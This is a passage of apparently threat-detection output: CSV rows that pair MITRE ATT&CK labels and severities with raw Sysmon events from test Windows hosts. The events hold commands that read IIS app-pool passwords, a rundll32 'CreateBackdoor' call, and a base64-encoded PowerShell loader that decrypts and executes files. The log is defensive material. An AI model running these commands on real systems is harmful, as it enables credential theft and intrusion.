<EventID>7</EventID>
<Version>3</Version>
<Level>4</Level>
<Task>7</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-18T17:01:34.659248Z"">
</TimeCreated>
<EventRecordID>27</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3192"" ThreadID=""3288"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">technique_id=T1003,technique_name=Credential Dumping</Data>
<Data Name=""UtcTime"">2019-04-18 17:01:34.629</Data>
<Data Name=""ProcessGuid"">365ABB72-AC28-5CB8-0000-0010F3F70700</Data>
<Data Name=""ProcessId"">1200</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ImageLoaded"">C:\Windows\System32\hid.dll</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Hid User Library</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""Hashes"">SHA1=1BC4F63F2111059372F02E0B3893A38589B38688,MD5=63DF770DF74ACB370EF5A16727069AAF,SHA256=B8F96336BF87F1153C245D19606CBD10FBE7CF2795BCC762F2A1B57CB7C39116,IMPHASH=480C71617B8C5E2173781DA9C5B742AE</Data>
<Data Name=""Signed"">true</Data>
<Data Name=""Signature"">Microsoft Windows</Data>
<Data Name=""SignatureStatus"">Valid</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1555606894.689291,2019-04-18T21:01:34.689291+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>7</EventID>
<Version>3</Version>
<Level>4</Level>
<Task>7</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-18T17:01:34.659248Z"">
</TimeCreated>
<EventRecordID>27</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3192"" ThreadID=""3288"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">technique_id=T1003,technique_name=Credential Dumping</Data>
<Data Name=""UtcTime"">2019-04-18 17:01:34.629</Data>
<Data Name=""ProcessGuid"">365ABB72-AC28-5CB8-0000-0010F3F70700</Data>
<Data Name=""ProcessId"">1200</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ImageLoaded"">C:\Windows\System32\hid.dll</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Hid User Library</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""Hashes"">SHA1=1BC4F63F2111059372F02E0B3893A38589B38688,MD5=63DF770DF74ACB370EF5A16727069AAF,SHA256=B8F96336BF87F1153C245D19606CBD10FBE7CF2795BCC762F2A1B57CB7C39116,IMPHASH=480C71617B8C5E2173781DA9C5B742AE</Data>
<Data Name=""Signed"">true</Data>
<Data Name=""Signature"">Microsoft Windows</Data>
<Data Name=""SignatureStatus"">Valid</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920557.581146,2019-05-27T05:29:17.581146+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppool /text:processmodel.password ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:17.581146Z"">
</TimeCreated>
<EventRecordID>5892</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:17.420</Data>
<Data Name=""ProcessGuid"">365ABB72-3D6D-5CEB-0000-0010576BFF00</Data>
<Data Name=""ProcessId"">2928</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppool /text:processmodel.password</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1082] System Information Discovery,1584794166.990686,2020-03-21T16:36:06.990686+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T12:36:03.901088Z"">
</TimeCreated>
<EventRecordID>244341</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2844"" ThreadID=""3648"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 12:36:03.899</Data>
<Data Name=""ProcessGuid"">747F3D96-0A33-5E76-0000-0010B8813D00</Data>
<Data Name=""ProcessId"">3696</Data>
<Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">whoami - displays logged on user information</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">whoami.exe</Data>
<Data Name=""CommandLine"">whoami</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-069C-5E76-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88</Data>
<Data Name=""ParentProcessGuid"">747F3D96-08DA-5E76-0000-001054382E00</Data>
<Data Name=""ParentProcessId"">2632</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1053] Scheduled Task manipulation ,1558843303.567204,2019-05-26T08:01:43.567204+04:00,,Threat,Medium,"Found User (NT AUTHORITY\SYSTEM) Trying to run taskeng.exe or svchost.exe with Command Line (C:\Windows\system32\svchost.exe) and Parent Image :C:\Users\IEUser\Desktop\info.rar\jjs.exe , Parent CommandLine (&quot;C:\Users\IEUser\Desktop\info.rar\jjs.exe&quot;) in directory : ( C:\Windows\system32\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-26T04:01:43.567204Z"">
</TimeCreated>
<EventRecordID>4863</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""984"" ThreadID=""2352"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-26 04:01:43.557</Data>
<Data Name=""ProcessGuid"">365ABB72-0FA7-5CEA-0000-001064C60A00</Data>
<Data Name=""ProcessId"">3908</Data>
<Data Name=""Image"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Host Process for Windows Services</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">C:\Windows\system32\svchost.exe</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-8DBD-5CEA-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=4AF001B3C3816B860660CF2DE2C0FD3C1DFB4878,MD5=54A47F6B5E09A77E61649109C6A08866,SHA256=121118A0F5E0E8C933EFD28C9901E54E42792619A8A3A6D11E1F0025A7324BC2,IMPHASH=58E185299ECCA757FE68BA83A6495FDE</Data>
<Data Name=""ParentProcessGuid"">365ABB72-0FA6-5CEA-0000-0010FEC30A00</Data>
<Data Name=""ParentProcessId"">3884</Data>
<Data Name=""ParentImage"">C:\Users\IEUser\Desktop\info.rar\jjs.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Users\IEUser\Desktop\info.rar\jjs.exe&quot;</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1053] Scheduled Task - Process,1558843303.567204,2019-05-26T08:01:43.567204+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\svchost.exe ) through command line ( C:\Windows\system32\svchost.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-26T04:01:43.567204Z"">
</TimeCreated>
<EventRecordID>4863</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""984"" ThreadID=""2352"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-26 04:01:43.557</Data>
<Data Name=""ProcessGuid"">365ABB72-0FA7-5CEA-0000-001064C60A00</Data>
<Data Name=""ProcessId"">3908</Data>
<Data Name=""Image"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Host Process for Windows Services</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">C:\Windows\system32\svchost.exe</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-8DBD-5CEA-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=4AF001B3C3816B860660CF2DE2C0FD3C1DFB4878,MD5=54A47F6B5E09A77E61649109C6A08866,SHA256=121118A0F5E0E8C933EFD28C9901E54E42792619A8A3A6D11E1F0025A7324BC2,IMPHASH=58E185299ECCA757FE68BA83A6495FDE</Data>
<Data Name=""ParentProcessGuid"">365ABB72-0FA6-5CEA-0000-0010FEC30A00</Data>
<Data Name=""ParentProcessId"">3884</Data>
<Data Name=""ParentImage"">C:\Users\IEUser\Desktop\info.rar\jjs.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Users\IEUser\Desktop\info.rar\jjs.exe&quot;</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[ T1003 ] Credential Dumping ImageLoad,1555606894.659248,2019-04-18T21:01:34.659248+04:00,,Threat,Medium,[ T1003 ] Credential Dumping ImageLoad,7,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>7</EventID>
<Version>3</Version>
<Level>4</Level>
<Task>7</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-18T17:01:34.448945Z"">
</TimeCreated>
<EventRecordID>26</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3192"" ThreadID=""3288"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">technique_id=T1003,technique_name=Credential Dumping</Data>
<Data Name=""UtcTime"">2019-04-18 17:01:34.418</Data>
<Data Name=""ProcessGuid"">365ABB72-AC28-5CB8-0000-0010F3F70700</Data>
<Data Name=""ProcessId"">1200</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ImageLoaded"">C:\Windows\System32\samlib.dll</Data>
<Data Name=""FileVersion"">6.1.7601.23677 (win7sp1_ldr.170209-0600)</Data>
<Data Name=""Description"">SAM Library DLL</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""Hashes"">SHA1=922AF00065798A27238A6AE544BE314A3C3C7479,MD5=F3E69E053D4FA762A663ED7B77A5F4DD,SHA256=5D39A09D13D6085EDA7767771268E59888DE7ACE54E6DC9CA1B023E080254BCF,IMPHASH=B9E4EE1E8A5256343DE29E67C1CB41FA</Data>
<Data Name=""Signed"">true</Data>
<Data Name=""Signature"">Microsoft Windows</Data>
<Data Name=""SignatureStatus"">Valid</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1555606894.659248,2019-04-18T21:01:34.659248+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>7</EventID>
<Version>3</Version>
<Level>4</Level>
<Task>7</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-18T17:01:34.448945Z"">
</TimeCreated>
<EventRecordID>26</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3192"" ThreadID=""3288"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">technique_id=T1003,technique_name=Credential Dumping</Data>
<Data Name=""UtcTime"">2019-04-18 17:01:34.418</Data>
<Data Name=""ProcessGuid"">365ABB72-AC28-5CB8-0000-0010F3F70700</Data>
<Data Name=""ProcessId"">1200</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ImageLoaded"">C:\Windows\System32\samlib.dll</Data>
<Data Name=""FileVersion"">6.1.7601.23677 (win7sp1_ldr.170209-0600)</Data>
<Data Name=""Description"">SAM Library DLL</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""Hashes"">SHA1=922AF00065798A27238A6AE544BE314A3C3C7479,MD5=F3E69E053D4FA762A663ED7B77A5F4DD,SHA256=5D39A09D13D6085EDA7767771268E59888DE7ACE54E6DC9CA1B023E080254BCF,IMPHASH=B9E4EE1E8A5256343DE29E67C1CB41FA</Data>
<Data Name=""Signed"">true</Data>
<Data Name=""Signature"">Microsoft Windows</Data>
<Data Name=""SignatureStatus"">Valid</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1584766825.401237,2020-03-21T09:00:25.401237+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:25.392464Z"">
</TimeCreated>
<EventRecordID>243550</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:25.388</Data>
<Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-001055912000</Data>
<Data Name=""ProcessId"">8160</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920557.350815,2019-05-27T05:29:17.350815+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppool /text:processmodel.username ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:17.350815Z"">
</TimeCreated>
<EventRecordID>5889</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:17.310</Data>
<Data Name=""ProcessGuid"">365ABB72-3D6D-5CEB-0000-00109767FF00</Data>
<Data Name=""ProcessId"">3096</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppool /text:processmodel.username</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
